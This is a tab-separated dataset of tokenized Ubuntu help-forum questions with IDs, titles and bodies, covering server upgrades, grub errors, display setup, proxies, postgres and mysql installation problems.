337881	i 've inherited a dangerously out of date server . how do i plan to safely upgrade it ?	apticron runs nightly on the box and is telling me that i have about 150 updates that need to be made . the server is running quite a few important services with no true backup so i 'm scared to just start updating . how should i game plan this ? edit : lsb_release : distributor id : ubuntu description : ubuntu 8.04.3 lts release : 8.04 codename : hardy the following packages are currently pending an upgrade : apache2 2.2.8-1ubuntu0.25 apache2.2-common 2.2.8-1ubuntu0.25 apache2-mpm-prefork 2.2.8-1ubuntu0.25 apache2-utils 2.2.8-1ubuntu0.25 apparmor 2.1+1075-0ubuntu9.3 apparmor-utils 2.1+1075-0ubuntu9.3 apt 0.7.9ubuntu17.6 apt-utils 0.7.9ubuntu17.6 base-files 4.0.1ubuntu5.8.04.8 bind9-host 1:9.4.2.dfsg.p2-2ubuntu0.12 bsdutils 1:2.13.1-5ubuntu3.1 bzip2 1.0.4-2ubuntu4.2 clamav 0.97.8+dfsg-1ubuntu1.08.04.1 clamav-base 0.97.8+dfsg-1ubuntu1.08.04.1 clamav-freshclam 0.97.8+dfsg-1ubuntu1.08.04.1 curl 7.18.0-1ubuntu2.4 dhcp3-common 3.0.6.dfsg-1ubuntu9.3 dnsutils 1:9.4.2.dfsg.p2-2ubuntu0.12 dpkg 1.14.16.6ubuntu4.2 dpkg-dev 1.14.16.6ubuntu4.2 fuse-utils 2.7.2-1ubuntu2.3 gnupg 1.4.6-2ubuntu5.2 gpgv 1.4.6-2ubuntu5.2 grub 0.97-29ubuntu21.2 gzip 1.3.12-3.2ubuntu0.1 klibc-utils 1.5.7-4ubuntu5 krb5-user 1.6.dfsg.3~beta1-2ubuntu1.8 ldap-utils 2.4.9-0ubuntu0.8.04.5 libapache2-mod-fcgid 1:2.2-1ubuntu0.8.04.1 libapache2-mod-php5 5.2.4-2ubuntu5.27 libapache2-svn 1.5.1dfsg1-1ubuntu2~hardy3 libapr1 1.2.11-1ubuntu0.2 libaprutil1 1.2.12+dfsg-3ubuntu0.3 libbind9-30 1:9.4.2.dfsg.p2-2ubuntu0.12 libbz2-1.0 1.0.4-2ubuntu4.2 libc6 2.7-10ubuntu8.3 libc6-dev 2.7-10ubuntu8.3 libc6-i686 2.7-10ubuntu8.3 libclamav6 0.97.8+dfsg-1ubuntu1.08.04.1 libcupsys2 1.3.7-1ubuntu3.16 libcurl3 7.18.0-1ubuntu2.4 libcurl3-gnutls 7.18.0-1ubuntu2.4 libdbus-1-3 1.1.20-1ubuntu3.9 libdns35 1:9.4.2.dfsg.p2-2ubuntu0.12 libdns36 1:9.4.2.dfsg.p2-2ubuntu0.12 libexpat1 2.0.1-0ubuntu1.2 libexpat1-dev 2.0.1-0ubuntu1.2 libfreetype6 2.3.5-1ubuntu4.8.04.10 libfreetype6-dev 2.3.5-1ubuntu4.8.04.10 libfuse2 2.7.2-1ubuntu2.3 libgc1c2 1:6.8-1.1ubuntu0.1 libgd2-xpm 2.0.35.dfsg-3ubuntu2.1 libgd2-xpm-dev 2.0.35.dfsg-3ubuntu2.1 libgnutls13 2.0.4-1ubuntu2.9 libhtml-parser-perl 3.56-1ubuntu0.1 libisc35 1:9.4.2.dfsg.p2-2ubuntu0.12 libisccc30 1:9.4.2.dfsg.p2-2ubuntu0.12 libisccfg30 1:9.4.2.dfsg.p2-2ubuntu0.12 libkadm55 1.6.dfsg.3~beta1-2ubuntu1.8 libklibc 1.5.7-4ubuntu5 libkrb53 1.6.dfsg.3~beta1-2ubuntu1.8 libkrb5-dev 1.6.dfsg.3~beta1-2ubuntu1.8 liblcms1 1.16-7ubuntu1.3 libldap-2.4-2 2.4.9-0ubuntu0.8.04.5 liblwres30 1:9.4.2.dfsg.p2-2ubuntu0.12 libmysqlclient15off 5.0.96-0ubuntu3 libpam0g 0.99.7.1-5ubuntu6.5 libpam-modules 0.99.7.1-5ubuntu6.5 libpam-runtime 0.99.7.1-5ubuntu6.5 libpango1.0-0 1.20.5-0ubuntu1.2 libpango1.0-common 1.20.5-0ubuntu1.2 libperl5.8 5.8.8-12ubuntu0.8 libpng12-0 1.2.15~beta5-3ubuntu0.7 libpng12-dev 1.2.15~beta5-3ubuntu0.7 libpq5 8.3.23-0ubuntu8.04.1 libsnmp15 5.4.1~dfsg-4ubuntu4.4 libsnmp-base 5.4.1~dfsg-4ubuntu4.4 libssl0.9.8 0.9.8g-4ubuntu3.20 libssl-dev 0.9.8g-4ubuntu3.20 libsvn1 1.5.1dfsg1-1ubuntu2~hardy3 libsvn-perl 1.5.1dfsg1-1ubuntu2~hardy3 libtasn1-3 1.1-1ubuntu0.1 libthai0 0.1.9-1ubuntu0.2 libthai-data 0.1.9-1ubuntu0.2 libtiff4 3.8.2-7ubuntu3.16 libtomcat5.5-java 5.5.25-5ubuntu1.3 libwww-perl 5.808-1ubuntu0.1 libxml2 2.6.31.dfsg-2ubuntu1.12 libxml2-dev 2.6.31.dfsg-2ubuntu1.12 libxslt1.1 1.1.22-1ubuntu1.4 libxslt1-dev 1.1.22-1ubuntu1.4 linux-image-2.6.24-32-server 2.6.24-32.107 linux-image-server 2.6.24.32.34 linux-libc-dev 2.6.24-32.107 linux-server 2.6.24.32.34 linux-ubuntu-modules-2.6.24-32-server 2.6.24-32.52 logrotate 3.7.1-3ubuntu0.8.04.1 mount 2.13.1-5ubuntu3.1 mysql-client-5.0 5.0.96-0ubuntu3 mysql-common 5.0.96-0ubuntu3 mysql-server 5.0.96-0ubuntu3 mysql-server-5.0 5.0.96-0ubuntu3 nagios-plugins 1.4.11-1ubuntu5.1 nagios-plugins-basic 1.4.11-1ubuntu5.1 nagios-plugins-extra 1.4.11-1ubuntu5.1 nagios-plugins-standard 1.4.11-1ubuntu5.1 nfs-common 1:1.1.2-2ubuntu2.4 nscd 2.7-10ubuntu8.3 ntp 1:4.2.4p4+dfsg-3ubuntu2.3 ntpdate 1:4.2.4p4+dfsg-3ubuntu2.3 openssh-client 1:4.7p1-8ubuntu3 openssh-server 1:4.7p1-8ubuntu3 openssl 0.9.8g-4ubuntu3.20 perl 5.8.8-12ubuntu0.8 perl-base 5.8.8-12ubuntu0.8 perl-doc 5.8.8-12ubuntu0.8 perl-modules 5.8.8-12ubuntu0.8 php5 5.2.4-2ubuntu5.27 php5-cli 5.2.4-2ubuntu5.27 php5-common 5.2.4-2ubuntu5.27 php5-curl 5.2.4-2ubuntu5.27 php5-dev 5.2.4-2ubuntu5.27 php5-gd 5.2.4-2ubuntu5.27 php5-ldap 5.2.4-2ubuntu5.27 php5-mysql 5.2.4-2ubuntu5.27 php5-sybase 5.2.4-2ubuntu5.27 php5-tidy 5.2.4-2ubuntu5.27 phpmyadmin 4:2.11.3-1ubuntu1.3 postfix 2.5.1-2ubuntu1.4 python2.5 2.5.2-2ubuntu6.2 python2.5-dev 2.5.2-2ubuntu6.2 python2.5-minimal 2.5.2-2ubuntu6.2 python-apt 0.7.4ubuntu7.7 python-libxml2 2.6.31.dfsg-2ubuntu1.12 python-subversion 1.5.1dfsg1-1ubuntu2~hardy3 samba-doc 3.0.28a-1ubuntu4.18 snmp 5.4.1~dfsg-4ubuntu4.4 ssh 1:4.7p1-8ubuntu3 subversion 1.5.1dfsg1-1ubuntu2~hardy3 subversion-tools 1.5.1dfsg1-1ubuntu2~hardy3 sudo 1.6.9p10-1ubuntu3.10 sun-java5-bin 1.5.0-22-0ubuntu0.8.04 sun-java5-demo 1.5.0-22-0ubuntu0.8.04 sun-java5-jdk 1.5.0-22-0ubuntu0.8.04 sun-java5-jre 1.5.0-22-0ubuntu0.8.04 tomcat5.5 5.5.25-5ubuntu1.3 tomcat5.5-admin 5.5.25-5ubuntu1.3 tomcat5.5-webapps 5.5.25-5ubuntu1.3 tzdata 2012e~repack-0ubuntu0.8.04 update-manager-core 1:0.87.33 util-linux 2.13.1-5ubuntu3.1 util-linux-locales 2.13.1-5ubuntu3.1 w3m 0.5.1-5.1ubuntu1.1 wget 1.10.2-3ubuntu1.2 x11-xserver-utils 7.3+2ubuntu0.1
337887	is there a multiboot iso creator for ubuntu ?	i want to create a multi boot cd in windows i do this with xboot but is there any program to create multi boot iso in ubuntu
337894	how to set a socks proxy server only for one user ?	in ubuntu 13.04 i tried to insert export socks_proxy=socks : //address : port into ~/.profile but this is not working . ps : i need to set it only for a user so not in /etc/enviroment .
337905	where is the file i saved on my usb flash drive ?	i am running ubuntu from a pendrive and i saved a document in libreoffice . my computer shut down and now i ca n't find it anywhere ! i 've read that if running ubuntu from pendrive it saves documents onto the usb flash drive , but they ca n't be seen while actually running ubuntu from usb . so how can i find my saved document ? also , is there a way to virtual mount the ubuntu iso from the usb to the computer ? i tried to install , but i do n't have enough memory on my hard disk - only 3gb . i 'm just a new user , so please help me in the most basic , step-by-step way if you can . thank you so much in advance !
337906	ubuntu 12.04 . how to set up dual monitor with intel 2nd generation intelâž coreâ˘ processors	i have a dell xps15 l502x dual-booting win8 and ubuntu 12.04 . when i try to connect my second monitor through the hdmi port , the second monitor just says there 's no signal . when i run lspci -v , i get the following : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : dell device 04b6 flags : bus master , fast devsel , latency 0 , irq 50 memory at f1400000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 4000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915 when i run xrandr , i get : screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 1366x768 60.1*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) i have no clue how to enable my second monitor . i do have another nvidia graphics card : 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 540m ] ( rev ff ) ( prog-if ff ) ! ! ! unknown header type 7f in my laptop but i do n't want to use it since the support for nvidia optimus graphics cards is poor on linux . can anyone suggest a fix for this ? thanks !
337912	-bash : /bin/ls : no such file or directory	hello i do n't know where problem about this . i want to use the command ls , but the terminal says it does n't exist . this is the screenshot . i logged in with root user . command with stat , the output at below : root @ ns1 : ~ # stat /bin/ls file : `/bin/ls' size : 39696 blocks : 80 io block : 4096 regular file device : 802h/2050d inode : 2488208 links : 1 access : ( 0755/-rwxr-xr-x ) uid : ( 0/ root ) gid : ( 0/ root ) access : 2013-08-27 21:00:59.825120536 +0700 modify : 2010-09-22 01:32:55.000000000 +0700 change : 2013-08-27 21:00:48.291368562 +0700 root @ ns1 : ~ # stat / file : `/' size : 4096 blocks : 8 io block : 4096 directory device : 802h/2050d inode : 2 links : 23 access : ( 0755/drwxr-xr-x ) uid : ( 0/ root ) gid : ( 0/ root ) access : 2013-08-27 15:48:31.285959829 +0700 modify : 2013-08-27 15:42:39.251379071 +0700 change : 2013-08-27 15:42:39.251379071 +0700 root @ ns1 : ~ # stat /bin file : `/bin' size : 4096 blocks : 8 io block : 4096 directory device : 802h/2050d inode : 392449 links : 2 access : ( 0755/drwxr-xr-x ) uid : ( 0/ root ) gid : ( 0/ root ) access : 2013-08-27 20:53:00.251389526 +0700 modify : 2013-08-27 20:51:59.861361479 +0700 change : 2013-08-27 20:51:59.861361479 +0700
337915	how can i update ubuntu v12.04 to v13.04 without using a internet connection ?	i have ubuntu 12.04 and i want to update to 13.04 , but without downloading it from the website . how can i do it ?
337923	error during system update	i 'm here to ask help because since each time i do a system update i get errors on the terminal and it is impossible for me to update the kernel to more recent versions . here i post the output of the command `` sudo apt-get update '' : reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : linux-image-3.2.0-37-generic linux-image-3.2.0-48-generic linux-image-3.2.0-51-generic linux-image-3.2.0-52-generic 0 upgraded , 0 newly installed , 4 to remove and 0 not upgraded . 6 not fully installed or removed . after this operation , 599 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 313423 files and directories currently installed . ) removing linux-image-3.2.0-37-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-37-generic /boot/vmlinuz-3.2.0-37-generic update-initramfs : deleting /boot/initrd.img-3.2.0-37-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-37-generic /boot/vmlinuz-3.2.0-37-generic generating grub.cfg ... /etc/grub.d/00_header : 148 : /etc/grub.d/00_header : syntax error : missing ' } ' run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-37-generic.postrm line 328. dpkg : error processing linux-image-3.2.0-37-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 removing linux-image-3.2.0-48-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-48-generic /boot/vmlinuz-3.2.0-48-generic update-initramfs : deleting /boot/initrd.img-3.2.0-48-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-48-generic /boot/vmlinuz-3.2.0-48-generic generating grub.cfg ... /etc/grub.d/00_header : 148 : /etc/grub.d/00_header : syntax error : missing ' } ' run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-48-generic.postrm line 328. dpkg : error processing linux-image-3.2.0-48-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 removing linux-image-3.2.0-51-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-51-generic /boot/vmlinuz-3.2.0-51-generic update-initramfs : deleting /boot/initrd.img-3.2.0-51-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-51-generic /boot/vmlinuz-3.2.0-51-generic generating grub.cfg ... /etc/grub.d/00_header : 148 : /etc/grub.d/00_header : syntax error : missing ' } ' run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-51-generic.postrm line 328. dpkg : error processing linux-image-3.2.0-51-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 removing linux-image-3.2.0-52-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-52-generic /boot/vmlinuz-3.2.0-52-generic update-initramfs : deleting /boot/initrd.img-3.2.0-52-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-52-generic /boot/vmlinuz-3.2.0-52-generic generating grub.cfg ... /etc/grub.d/00_header : 148 : /etc/grub.d/00_header : syntax error : missing ' } ' run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-52-generic.postrm line 328. dpkg : error processing linux-image-3.2.0-52-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : linux-image-3.2.0-37-generic linux-image-3.2.0-48-generic linux-image-3.2.0-51-generic linux-image-3.2.0-52-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i tried also to remove the kernels that i 'm not currently using , actually i 'm using kernel 3.2.0-49-generic . her follows the output of the command `` sudo apt-get purge linux-image-3.2.0-37-generic linux-image-3.2.0-48-generic linux-image-3.2.0-51-generic linux-image-3.2.0-52-generic '' : reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : linux-image-3.2.0-37-generic linux-image-3.2.0-48-generic linux-image-3.2.0-51-generic linux-image-3.2.0-52-generic 0 upgraded , 0 newly installed , 4 to remove and 0 not upgraded . 6 not fully installed or removed . after this operation , 599 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 313423 files and directories currently installed . ) removing linux-image-3.2.0-37-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-37-generic /boot/vmlinuz-3.2.0-37-generic update-initramfs : deleting /boot/initrd.img-3.2.0-37-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-37-generic /boot/vmlinuz-3.2.0-37-generic generating grub.cfg ... /etc/grub.d/00_header : 148 : /etc/grub.d/00_header : syntax error : missing ' } ' run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-37-generic.postrm line 328. dpkg : error processing linux-image-3.2.0-37-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 removing linux-image-3.2.0-48-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-48-generic /boot/vmlinuz-3.2.0-48-generic update-initramfs : deleting /boot/initrd.img-3.2.0-48-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-48-generic /boot/vmlinuz-3.2.0-48-generic generating grub.cfg ... /etc/grub.d/00_header : 148 : /etc/grub.d/00_header : syntax error : missing ' } ' run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-48-generic.postrm line 328. dpkg : error processing linux-image-3.2.0-48-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 removing linux-image-3.2.0-51-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-51-generic /boot/vmlinuz-3.2.0-51-generic update-initramfs : deleting /boot/initrd.img-3.2.0-51-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-51-generic /boot/vmlinuz-3.2.0-51-generic generating grub.cfg ... /etc/grub.d/00_header : 148 : /etc/grub.d/00_header : syntax error : missing ' } ' run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-51-generic.postrm line 328. dpkg : error processing linux-image-3.2.0-51-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 removing linux-image-3.2.0-52-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-52-generic /boot/vmlinuz-3.2.0-52-generic update-initramfs : deleting /boot/initrd.img-3.2.0-52-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-52-generic /boot/vmlinuz-3.2.0-52-generic generating grub.cfg ... /etc/grub.d/00_header : 148 : /etc/grub.d/00_header : syntax error : missing ' } ' run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-52-generic.postrm line 328. dpkg : error processing linux-image-3.2.0-52-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : linux-image-3.2.0-37-generic linux-image-3.2.0-48-generic linux-image-3.2.0-51-generic linux-image-3.2.0-52-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) after that , launching the command `` dpkg -- list | grep linux-image '' , i get : rh linux-image-3.2.0-37-generic 3.2.0-37.58 linux kernel image for version 3.2.0 on 64 bit x86 smp rh linux-image-3.2.0-48-generic 3.2.0-48.74 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-49-generic 3.2.0-49.75 linux kernel image for version 3.2.0 on 64 bit x86 smp rh linux-image-3.2.0-51-generic 3.2.0-51.77 linux kernel image for version 3.2.0 on 64 bit x86 smp rh linux-image-3.2.0-52-generic 3.2.0-52.78 linux kernel image for version 3.2.0 on 64 bit x86 smp and clealry the unused kernels are still there . at last i post also the result of the command `` sudo update-grub '' : generating grub.cfg ... /etc/grub.d/00_header : 148 : /etc/grub.d/00_header : syntax error : missing ' } ' and the contents of the file `` /etc/grub.d/00_header '' causing the syntax error : # ! /bin/sh set -e # grub-mkconfig helper script . # copyright ( c ) 2006,2007,2008,2009,2010 free software foundation , inc. # # grub is free software : you can redistribute it and/or modify # it under the terms of the gnu general public license as published by # the free software foundation , either version 3 of the license , or # ( at your option ) any later version . # # grub is distributed in the hope that it will be useful , # but without any warranty ; without even the implied warranty of # merchantability or fitness for a particular purpose . see the # gnu general public license for more details . # # you should have received a copy of the gnu general public license # along with grub . if not , see < http : //www.gnu.org/licenses/ > . transform= '' s , x , x , '' prefix= '' /usr '' exec_prefix= '' $ { prefix } '' datarootdir= '' $ { prefix } /share '' locale_dir=`echo $ { grub_prefix } /locale | sed $ { transform } ` grub_lang=`echo $ lang | cut -d . -f 1` . `` $ { datarootdir } /grub/grub-mkconfig_lib '' # do this as early as possible , since other commands might depend on it . # ( e.g . the `loadfont ' command might need lvm or raid modules ) for i in $ { grub_preload_modules } ; do echo `` insmod $ i '' done if [ `` x $ { grub_default } '' = `` x '' ] ; then grub_default=0 ; fi if [ `` x $ { grub_default } '' = `` xsaved '' ] ; then grub_default= ' $ { saved_entry } ' ; fi if [ `` x $ { grub_timeout } '' = `` x '' ] ; then grub_timeout=5 ; fi if [ `` x $ { grub_gfxmode } '' = `` x '' ] ; then grub_gfxmode=auto ; fi if [ `` x $ { grub_default_button } '' = `` x '' ] ; then grub_default_button= '' $ grub_default '' ; fi if [ `` x $ { grub_default_button } '' = `` xsaved '' ] ; then grub_default_button= ' $ { saved_entry } ' ; fi if [ `` x $ { grub_timeout_button } '' = `` x '' ] ; then grub_timeout_button= '' $ grub_timeout '' ; fi cat < < eof if [ -s \ $ prefix/grubenv ] ; then set have_grubenv=true load_env fi eof if [ `` x $ grub_button_cmos_address '' ! = `` x '' ] ; then cat < < eof if cmostest $ grub_button_cmos_address ; then set default= '' $ { grub_default_button } '' else set default= '' $ { grub_default } '' fi eof else cat < < eof set default= '' $ { grub_default } '' eof fi cat < < eof if [ `` \ $ { prev_saved_entry } '' ] ; then set saved_entry= '' \ $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` \ $ { boot_once } '' ] ; then saved_entry= '' \ $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` \ $ { have_grubenv } '' ] ; then if [ -z `` \ $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { eof if [ -n `` $ { grub_video_backend } '' ] ; then cat < < eof insmod $ { grub_video_backend } eof else # insert all available backends ; grub will use the most appropriate . have_video=0 ; for backend in $ ( cat `` $ { grub_prefix } /video.lst '' ) ; do have_video=1 ; cat < < eof insmod $ { backend } eof done if [ x $ have_video = x0 ] ; then echo `` true '' fi fi cat < < eof } eof serial=0 ; gfxterm=0 ; for x in $ { grub_terminal_input } $ { grub_terminal_output } ; do if [ xserial = `` x $ x '' ] ; then serial=1 ; fi if [ xgfxterm = `` x $ x '' ] ; then gfxterm=1 ; fi done if [ `` x $ serial '' = x1 ] ; then if ! test -e `` $ { grub_prefix } /serial.mod '' ; then echo `` serial terminal not available on this platform . '' > & 2 ; exit 1 fi if [ `` x $ { grub_serial_command } '' = `` x '' ] ; then grub_warn `` requested serial terminal but grub_serial_command is unspecified . default parameters will be used . '' grub_serial_command=serial fi echo `` $ { grub_serial_command } '' fi if [ `` x $ gfxterm '' = x1 ] ; then # make the font accessible prepare_grub_to_access_device ` $ { grub_probe } -- target=device `` $ { grub_font_path } '' ` cat < < eof if loadfont `make_system_path_relative_to_its_root `` $ { grub_font_path } '' ` ; then set gfxmode= $ { grub_gfxmode } load_video insmod gfxterm eof # gettext variables and module if [ `` x $ { lang } '' ! = `` xc '' ] & & [ -d `` $ { locale_dir } '' ] ; then prepare_grub_to_access_device $ ( $ { grub_probe } -- target=device $ { locale_dir } ) | sed -e `` s/^/ / '' cat < < eof set locale_dir= ( \ $ root ) $ ( make_system_path_relative_to_its_root $ { locale_dir } ) set lang= $ { grub_lang thank you all for any help : )
337928	unable to mirror screen , ubuntu 13.04 asus ux32vd	when i choose mirror screen under display settings , it only shows the screen on the laptop . i do n't know where to begin . this is ubuntu 13.04 on asus ux32vd output from the requested command : felix @ felix-ux32vd : ~ $ sudo lshw -c display [ sudo ] password for felix : *-display description : vga compatible controller product : 3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:47 memory : f7400000-f77fffff memory : d0000000-dfffffff ioport : f000 ( size=64 )
337931	postgres - psql could not connect to the server	i instaled using : sudo apt-get install -y postgresql postgresql-contrib when i run psql , there is an error : psql : could not connect to server : no such file or directory is the server running locally and accepting connections on unix domain socket `` /var/run/postgresql/.s.pgsql.5433 '' ? ps auxw | grep post : postgres 1532 0.0 0.2 44168 5740 ? s 21:34 0:00 /opt/postgresql/9.1/bin/postgres -d /opt/postgresql/9.1/data postgres 1582 0.0 0.0 14312 768 ? ss 21:35 0:00 postgres : logger process postgres 1584 0.0 0.0 44168 1136 ? ss 21:35 0:00 postgres : writer process postgres 1585 0.0 0.0 44168 1128 ? ss 21:35 0:00 postgres : wal writer process postgres 1586 0.0 0.0 44576 1960 ? ss 21:35 0:00 postgres : autovacuum launcher process postgres 1587 0.0 0.0 14360 1056 ? ss 21:35 0:00 postgres : stats collector process jr 7835 0.0 0.0 4372 836 pts/0 s+ 23:04 0:00 grep -- color=auto post
337934	'unable to set password for the mysql `` root '' user ' on a openvz vps	i 'm trying to install mysql server on my openvz based vps running ubuntu 13.04 64bit and i keep getting this error at the install . i tried multiple times and i also re installed the os with no change at all . if i try to set the root user after i get error 2002 as you can see below.. i tried to google the problem but i did n't find anything like this , could you please help me ? thank in advance root @ server1 : ~ # apt-get install mysql-server mysql-common mysql-client reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libdbd-mysql-perl libmysqlclient18 mysql-client-5.5 mysql-server-5.5 suggested packages : tinyca mailx the following new packages will be installed : libdbd-mysql-perl libmysqlclient18 mysql-client mysql-client-5.5 mysql-common mysql-server mysql-server-5.5 0 upgraded , 7 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/18.0 mb of archives . after this operation , 66.9 mb of additional disk space will be used . do you want to continue [ y/n ] ? y preconfiguring packages ... package configuration ────────────────────────────────────────────────────────────────────────────── ┌──────────────────────configuring mysql-server-5.5─────────────────────────┐ │ while not mandatory , it is highly recommended that you set a password │ │ for the mysql administrative `` root '' user . │ │ │ │ if this field is left blank , the password will not be changed . │ │ │ │ new password for the mysql `` root '' user : │ │ ┌───────────────────────────────────────────────────────────────────────┐ │ │ │ │ │ ├─└───────────────────────────────────────────────────────────────────────┘─┤ │ < ok > │ └───────────────────────────────────────────────────────────────────────────┘ package configuration ────────────────────────────────────────────────────────────────────────────── ┌────────configuring mysql-server-5.5───────────┐ │ │ │ │ │ repeat password for the mysql `` root '' user : │ │ ┌───────────────────────────────────────────┐ │ │ │ │ │ ├─└───────────────────────────────────────────┘─┤ │ < ok > │ └───────────────────────────────────────────────┘ selecting previously unselected package mysql-common . ( reading database ... 41054 files and directories currently installed . ) unpacking mysql-common ( from ... /mysql-common_5.5.32-0ubuntu0.13.04.1_all.deb ) ... selecting previously unselected package libmysqlclient18 : amd64 . unpacking libmysqlclient18 : amd64 ( from ... /libmysqlclient18_5.5.32-0ubuntu0.13.04.1_amd64.deb ) ... selecting previously unselected package libdbd-mysql-perl . unpacking libdbd-mysql-perl ( from ... /libdbd-mysql-perl_4.021-1_amd64.deb ) ... selecting previously unselected package mysql-client-5.5 . unpacking mysql-client-5.5 ( from ... /mysql-client-5.5_5.5.32-0ubuntu0.13.04.1_amd64.deb ) ... processing triggers for man-db ... setting up mysql-common ( 5.5.32-0ubuntu0.13.04.1 ) ... selecting previously unselected package mysql-server-5.5 . ( reading database ... 41140 files and directories currently installed . ) unpacking mysql-server-5.5 ( from ... /mysql-server-5.5_5.5.32-0ubuntu0.13.04.1_amd64.deb ) ... selecting previously unselected package mysql-client . unpacking mysql-client ( from ... /mysql-client_5.5.32-0ubuntu0.13.04.1_all.deb ) ... selecting previously unselected package mysql-server . unpacking mysql-server ( from ... /mysql-server_5.5.32-0ubuntu0.13.04.1_all.deb ) ... processing triggers for man-db ... setting up libmysqlclient18 : amd64 ( 5.5.32-0ubuntu0.13.04.1 ) ... setting up libdbd-mysql-perl ( 4.021-1 ) ... setting up mysql-client-5.5 ( 5.5.32-0ubuntu0.13.04.1 ) ... setting up mysql-server-5.5 ( 5.5.32-0ubuntu0.13.04.1 ) ... invoke-rc.d : policy-rc.d denied execution of stop . package configuration ────────────────────────────────────────────────────────────────────────────── ┌───────────────────────configuring mysql-server-5.5─────────────────────────┐ │ unable to set password for the mysql `` root '' user │ │ │ │ an error occurred while setting the password for the mysql │ │ administrative user . this may have happened because the account already │ │ has a password , or because of a communication problem with the mysql │ │ server . │ │ │ │ you should check the account 's password after the package installation . │ │ │ │ please read the /usr/share/doc/mysql-server-5.5/readme.debian file for │ │ more information . │ │ │ │ │ ├────────────────────────────────────────────────────────────────────────────┤ │ < ok > │ └────────────────────────────────────────────────────────────────────────────┘ invoke-rc.d : policy-rc.d denied execution of start . setting up mysql-client ( 5.5.32-0ubuntu0.13.04.1 ) ... setting up mysql-server ( 5.5.32-0ubuntu0.13.04.1 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place root @ server1 : ~ # sudo mysql_secure_installation note : running all parts of this script is recommended for all mysql servers in production use ! please read each step carefully ! in order to log into mysql to secure it , we 'll need the current password for the root user . if you 've just installed mysql , and you have n't set the root password yet , the password will be blank , so you should just press enter here . enter current password for root ( enter for none ) : error 